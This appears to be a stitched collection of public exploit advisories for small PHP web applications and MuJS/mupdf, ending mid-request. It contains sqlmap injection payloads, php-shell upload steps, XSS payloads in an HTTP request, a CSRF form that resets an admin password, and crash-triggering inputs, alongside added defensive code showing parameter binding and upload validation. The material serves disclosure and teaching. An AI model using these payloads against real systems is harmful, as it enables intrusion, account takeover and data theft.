The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult? 
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2017
            
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux

Step 1. Log in to the application with admin credentials.

Step 2. Click on "Explore" and then select "Artworks".

Step 3. Choose any item; the URL should be:

http://localhost/art-bay/info_art.php?id=6

Step 4. Run sqlmap on the URL where the "id" parameter is given


sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8 AND 4531=4531

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=8 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- -
---

[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'

---


Step 5. sqlmap should confirm the injection successfully, which leads to
information disclosure.
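The boolean-based payload in the sqlmap output (`id=8 AND 4531=4531`) only works because the `id` value is spliced into the SQL text, so the application answers a true condition differently from a false one. The following is an added example (not code from Artworks Gallery, which is PHP) that reproduces that oracle against a small in-memory SQLite table and shows the two-part fix: validate the parameter's shape, then bind it as a query parameter. Table contents and column names are constructed for the example; `responds_to_boolean_probe` is the differential check a scanner performs, written here as a test a defender can keep in the suite.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed stand-in for the artworks table; rows are invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artworks (id INTEGER PRIMARY KEY, title TEXT, price INTEGER)")
    conn.executemany(
        "INSERT INTO artworks VALUES (?, ?, ?)",
        [(6, "Sunset", 120), (8, "Harbour", 300)],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The defect class: the request parameter becomes part of the SQL text."""
    query = "SELECT id, title FROM artworks WHERE id = " + user_id
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """The fix: reject anything that is not a plain integer, then bind it.

    A bound parameter is sent as a value, never parsed as SQL, so even a
    syntactically valid injection string cannot change the query's meaning.
    """
    if not re.fullmatch(r"\d+", user_id):
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM artworks WHERE id = ?", (int(user_id),)
    ).fetchall()


def responds_to_boolean_probe(conn, lookup):
    """True if a true and a false condition produce different results.

    This is the observation a boolean-based blind scan relies on; a correctly
    parameterised endpoint either rejects the input or answers identically.
    """
    true_probe, false_probe = "8 AND 4531=4531", "8 AND 4531=4532"  # from the sqlmap run above
    try:
        return lookup(conn, true_probe) != lookup(conn, false_probe)
    except (ValueError, sqlite3.Error):
        return False


if __name__ == "__main__":
    db = build_demo_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        print(f"{label:10s} boolean oracle present: {responds_to_boolean_probe(db, fn)}")
```

The time-based and UNION payloads in the output exploit the same splice point; parameter binding closes all three at once, while the regex keeps error messages from leaking database details when the value is not numeric.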
            
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link:  https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
--------------------
Proof of Concept:
--------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
            
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
---------------------
Proof of Concept:
---------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
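Both Artworks Gallery entries above (the profile picture and the artwork upload) come down to the same missing control: the server trusts the client-supplied filename and stores the file, under that name, in a directory the web server executes scripts from. The following is an added example (not code from the project) of the checks an upload handler for image fields should apply: an extension allow-list, a content check against image magic bytes, agreement between the two, and a server-chosen filename so the original name never reaches the filesystem. The file contents and names are constructed for the example.

```python
import os
import secrets

# Extensions the profile/artwork fields are allowed to accept (assumption for the example).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".gif"}

# Leading bytes of the image formats we accept; anything else is not an image.
IMAGE_MAGIC = (
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
)


def detect_image_type(data):
    """Return the canonical extension for the image type the bytes claim, or None."""
    for magic, ext in IMAGE_MAGIC:
        if data.startswith(magic):
            return ext
    return None


def normalise_extension(filename):
    """Lower-case the client-supplied extension and fold .jpeg onto .jpg."""
    ext = os.path.splitext(filename)[1].lower()
    return ".jpg" if ext == ".jpeg" else ext


def safe_upload_name(original_name, data):
    """Validate an uploaded image and return the name it should be stored under.

    Raises ValueError when the upload must be refused. The returned name is
    random and carries only the extension derived from the content, so a
    client name such as shell.php or shell.php.png never influences it.
    """
    claimed = normalise_extension(original_name)
    if claimed not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {claimed!r} not allowed")

    actual = detect_image_type(data)
    if actual is None:
        raise ValueError("content is not a recognised image")
    if actual != claimed:
        raise ValueError(f"content is {actual} but name claims {claimed}")

    return secrets.token_hex(16) + actual


def demo():
    """Run constructed uploads through the check and return the outcomes."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed PNG header
    script = b"<?php echo 'hello'; ?>"                    # constructed non-image content
    uploads = {
        "avatar.png": png,
        "shell.php": script,
        "shell.png": script,          # renamed script: extension passes, content fails
        "shell.php.png": script,      # double extension: same result
    }
    outcomes = {}
    for name, data in uploads.items():
        try:
            outcomes[name] = "stored as " + safe_upload_name(name, data)
        except ValueError as exc:
            outcomes[name] = f"rejected: {exc}"
    return outcomes


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:14s} {outcome}")
```

Validation alone is not sufficient: the `pictures/profile/` and `pictures/arts/` directories the advisories name should also be served with script execution disabled (or from a host that only serves static files), so that a bypass of the check still cannot yield command execution.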
            
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. 

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2
            
Source: http://seclists.org/oss-sec/2017/q1/458

Description:
Mujstest, which is part of mupdf, is a scriptable tester for mupdf + js.

A crafted image, posted earlier for another issue, causes a stack overflow.

The complete ASan output:

# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
    #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
    #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:358:7
    #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)

Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in frame
    #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:293

  This frame has 7 object(s):
    [32, 1056) 'path'
    [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows this variable
    [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows this variable
    [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows this variable
    [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows this variable
    [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows this variable
    [2400, 2404) 'b'
  0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==32127==ABORTING

Affected version:
1.10a

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6060

Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main

Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org

Note:
This bug was found with Address Sanitizer.

Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
            
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500

POC to trigger null pointer dereference (mutool)

After some fuzz testing I found a crashing test case.

Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642

To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null

ASAN:

==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
    #0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
    #1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
    #2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
    #3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
    #4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
    #5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
    #6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
    #7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
    #8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
    #9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
    #10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
    #11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
    #12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
    #13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
    #14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
    #15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
    #16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
    #17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
    #18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
    #19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
    #20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
            
# Exploit Title: DoS caused by the interactive call between two functions
# Date: 2018-01-16
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759

Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js

Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1)
            
Hello,

I want to submit the following bug:

The js_strtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an
integer overflow because of incorrect exponent validation.

# Exploit Title: Integer signedness error leading to Out-of-bounds read that causes crash
# Date: 2018-01-24
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-6191

Content of the poc file
$ cat poc.js
function pipo() {var 2e2147483648= 117486231123842366;}

Run it
$ mujs poc.js

Additional details about the bug:

Inside the function js_strtod, after this line
https://github.com/ccxvii/mujs/blob/81388eb40d29f10599ac30dde90e683a3c254375/jsdtoa.c#L714

exp = -exp;

the value of "exp" is still negative (because of the integer declaration).

Fixed in commit 25821e6d74fab5fcc200fe5e818362e03e114428 (http://git.ghostscript.com/?p=mujs.git;a=commit;h=25821e6d74fab5fcc200fe5e818362e03e114428)
            
########################################################################################
#______________________________________________________________________________________
# Exploit Title  : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork    : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link  : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date           : 15-December-2015
# Version        : (Version 1.00)
# CVE            : NONE
# Tested On      : Linux - Chrome
# Category       : Web Application
# MY HOME        : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________

## Vulnerability Code

<?php
include('config.php');

//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];

$article = $_GET['id'];

if (!is_numeric($article)) {
    header('Location: '.$siteurl);
}
else
{
    $sitequery = 'select * from settings;';
    $siteresult = mysql_query($sitequery,$connection) or die(mysql_error());

    //Create site settings variables
    $siteinfo = mysql_fetch_array($siteresult);
    $sitetitle = $siteinfo['title'];
    $siteurl = $siteinfo['url'];
    $sitecomments = $siteinfo['comments'];
    $commentmod = $siteinfo['commentmod'];

    // request value concatenated straight into the query
    $query = "select * from articles where status=0 and id = ".$article;

    $articleresults = mysql_query($query,$connection) or die(mysql_error());
    $num_results = mysql_num_rows($articleresults);
    $articleinfo = mysql_fetch_array($articleresults);

    if (!$num_results) {
        header('Location: '.$siteurl);
    }

    //Get article info
    $id = $articleinfo['id'];
    $authorid = $articleinfo['authorid'];
    $date = strtotime($articleinfo['date']);
    $artdate = date('m/d/y', $date);
    $categoryid = $articleinfo['categoryid'];
    $title = stripslashes($articleinfo['title']);
    $body = stripslashes($articleinfo['body']);
    $resource = $articleinfo['resource'];

    //Meta Info
    $cathead = 0;
    $metatitle = $title." - ";
    include('header.php');
    include('sidebar.php');

    if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }

    // Setup the article template
    $articletemp = new Template("templates/".$template."/article.tpl");

    // get author info
    $authorquery = "select * from authors where id=".$authorid;
    $authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
    $authorinfo = mysql_fetch_array($authorresult);
    $authorname = $authorinfo['displayname'];
    $authorbio = $authorinfo['bio'];
    $gravatar = $authorinfo['gravatar'];
    if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }

    // get category info
    $catquery = "select * from categories where id=".$categoryid;
    $catresult = mysql_query($catquery,$connection) or die(mysql_error());
    $catinfo = mysql_fetch_array($catresult);
    $categoryname = $catinfo['name'];
    $catparent = $catinfo['parentid'];
    if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }

    // if the category doesn't have a parent
    if ($catparent == NULL) {
        if ($seourls == 1) { // With SEO URLS
            $displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
                .$scrubcatname."/\"><b>".$categoryname."</b></a>";
        } else {
            $displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
                ."\"><b>".$categoryname."</b></a>";
        }

    // if the category DOES have a parent
    } else {
        $query = "select * from categories where id=".$catparent;
        $result = mysql_query($query,$connection) or die(mysql_error());
        $info = mysql_fetch_array($result);
        $parentname = $info['name'];
        if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }

        if ($seourls == 1) { // With SEO URLS
            $displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
                .$scrubparent."/\"><b>".$parentname."</b></a> >
                <a href=\"".$siteurl."/category/".$categoryid."/"
                .$scrubcatname."/\"><b>".$categoryname."</b></a>";
        } else {
            $displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
                ."\"><b>".$parentname."</b></a> >
                <a href=\"".$siteurl."/category.php?id=".$categoryid
                ."\"><b>".$categoryname."</b></a>";
        }
    }

    // Add a view to this article (the request value is concatenated again, three times)
    $query = "select * from articleviews where articleid = ".$article;
    $results = mysql_query($query,$connection) or die(mysql_error());
    $viewinfo = mysql_fetch_array($results);
    if ($viewinfo == NULL) {
        $sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
        $query = mysql_query($sql);
    } else {
        $totalviews = $viewinfo['views'];
        $totalviews++;

        $sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
        $query = mysql_query($sql);
    }

    if ($seourls == 1) { // With SEO URLS
        $authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
    } else {
        $authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
    }

    // Setup all template variables for display
    $articletemp->set("authorname", $authorname);
    $articletemp->set("authorlink", $authorlink);
    $articletemp->set("date", $artdate);
    $articletemp->set("displaycat", $displaycat);
    $articletemp->set("views", $totalviews);
    $articletemp->set("title", $title);
    $articletemp->set("body", $body);
    $articletemp->set("gravatar", $gravatar);
    $articletemp->set("resource", $resource);

    // For the adcode
    $query = "select * from adboxes where id=1;";
    $result = mysql_query($query,$connection) or die(mysql_error());
    $info = mysql_fetch_assoc($result);
    $articletemp->set("250adcode", stripslashes($info['adcode']));

    // Outputs the homepage template!
    echo $articletemp->output();

    //Displays the comments -- if admin has them enabled
    if($sitecomments == 0) {
        echo "<br/><h2>Comments</h2>";

        require_once 'comments/classes/Comments.class.php';

        /* Article ID which shows the comments */
        $post_id = $article;

        /* Level of hierarchy comments. Infinite if declared NULL */
        $level = NULL;

        /* Number of Supercomments (level 0) to display per page */
        $supercomments_per_page = 10000;

        /* Moderate comments? */
        if ($commentmod == 0) {
            $moderation = true;
        } else {
            $moderation = false;
        }

        # Setup db config array #
        $db_config = array("db_name" => $db_name,
                           "db_user" => $dbusername,
                           "db_pass" => $dbpassword,
                           "db_host" => $server );

        # Create Object of class comments
        $comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);

        # Display comments #
        echo $comments->getComments();
    }

    include('rightsidebar.php');
    include('obinclude.php');
}

?>

#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################
            
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When the admin clicks on a malicious link, the attacker can log in as a new
administrator with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post" action="http://localhost/{PATH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" value="12345678">
      <input type="hidden" name="pass2" value="12345678">
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->
            
# Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5 
# Tested on: Linux
# CVE : N/A

::PROOF OF CONCEPT::

- REQUEST:

POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register

- Vulnerable file: articleFR/system/profile.functions.php
- Vulnerable parameter: username
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'
- Vulnerable function:
function getProfile($_username, $_connection) {
    // username is concatenated into the SQL string without escaping or binding
    $_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";
    $_result = single_resulti($_q, $_connection);

    $_retval['id'] = $_result['id'];
    $_retval['name'] = $_result['name'];
    $_retval['username'] = $_result['username'];
    $_retval['password'] = $_result['password'];
    $_retval['email'] = $_result['email'];
    $_retval['website'] = $_result['website'];
    $_retval['blog'] = $_result['blog'];
    $_retval['date'] = $_result['date'];
    $_retval['isactive'] = $_result['isactive'];
    $_retval['activekey'] = $_result['activekey'];
    $_retval['membership'] = $_result['membership'];

    return $_retval;
}
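Both the Article Script article.php listing above and articleFR's getProfile() build SQL by concatenating request data: an id that has only passed is_numeric(), and a username that is not checked at all. The usual fix is the same in both cases, so the following is one added example (not code from ArticleSetup or articleFR) showing each lookup rewritten with PDO prepared statements. Table and column names come from the queries quoted in the advisories; the connection helper, function names and the PDO attribute choices are this example's assumptions.

```php
<?php
// Added example, not ArticleSetup's or articleFR's own code: the two vulnerable
// lookups rewritten so that request data is bound as a parameter and never
// becomes part of the SQL text. Assumes PDO with the MySQL driver.

declare(strict_types=1);

function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// article.php: the original accepted anything is_numeric() accepts (signs,
// decimals, exponent notation) and concatenated it. Here the id must be a plain
// positive integer, and it is bound as an integer rather than concatenated.
function fetchArticleById(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                                  // caller redirects and exits
    }
    $stmt = $db->prepare('SELECT * FROM articles WHERE status = 0 AND id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// profile.functions.php: getProfile() closed its WHERE clause with a quoted,
// concatenated username. A bound string parameter makes quotes in it inert.
function getProfile(PDO $db, string $username): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, name, password, email, website, blog, date,
                isactive, activekey, membership
           FROM users WHERE username = :username'
    );
    $stmt->bindValue(':username', $username, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// Usage sketch for article.php. Note the exit after the redirect: the original
// sent a Location header on "no results" and then kept rendering the page.
// $db = connect('mysql:host=localhost;dbname=articles;charset=utf8mb4', $dbusername, $dbpassword);
// $articleinfo = fetchArticleById($db, $_GET['id'] ?? '');
// if ($articleinfo === null) { header('Location: ' . $siteurl); exit; }
```

The same pattern applies to the author, category and articleviews queries in article.php: every place `.$article`, `.$authorid`, `.$categoryid` or `.$catparent` is spliced into a string becomes a bound integer parameter. Disabling emulated prepares matters because with emulation the driver interpolates values client-side; with it off, the statement text and the values travel to the server separately.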
            
# Exploit Title: Arbitrary File Upload in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5 
# Tested on: Linux
# CVE : N/A


::PROOF OF CONCEPT::

- REQUEST:

POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=---------------------------277651700022570
